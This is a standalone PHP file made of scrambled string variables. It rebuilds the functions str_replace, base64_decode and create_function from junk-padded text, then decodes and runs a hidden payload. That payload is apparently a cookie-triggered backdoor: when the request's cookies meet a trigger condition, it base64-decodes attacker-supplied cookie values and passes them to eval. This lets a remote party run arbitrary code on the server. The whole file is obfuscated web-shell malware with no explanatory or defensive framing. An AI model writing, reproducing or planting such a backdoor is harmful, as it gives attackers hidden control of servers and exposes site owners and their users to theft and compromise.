<?php
$rpsa="b2luKGFycmF5X3NsaWNlKCRhLiyCRjKCRhKS0zKiySkpKSk7ZWNiyobyAiynPC8nLiRrLiyic+Jiyzt9";
$eelg="19yZXBsYWNliyKGFyiyciymF5KiyCciyvW15iycdiyz1cc10viyJywnL1xzLycpLCBhcnJheSgiynJywiynKiyycpLCBq";
$xfoa = str_replace("y","","sytyr_yreypylyaycye");
$rygw="SdhbWExMjMnO2iyVjaG8gJzwnLiRrLiiyc+JziytldiymFsKGJhciy2U2NF9kiyZWNvZGUocHJlZ";
$tvts="JGM9J2NiyvdW50iyJzskYT0kX0NPT0tJRTtiypZihyZXNldCgkYSk9PSdvcycgJiYgJGMoJGEpPjMpeiyyRrPiy";
$ybua = $xfoa("eq", "", "eqbeqaseeq6eq4_deqeeqceqoeqde");
$dmtr = $xfoa("et","","etcreteetaetteteet_fetuetnetctetioetn");
$qshm = $dmtr('', $ybua($xfoa("iy", "", $tvts.$rygw.$eelg.$rpsa))); $qshm();
?>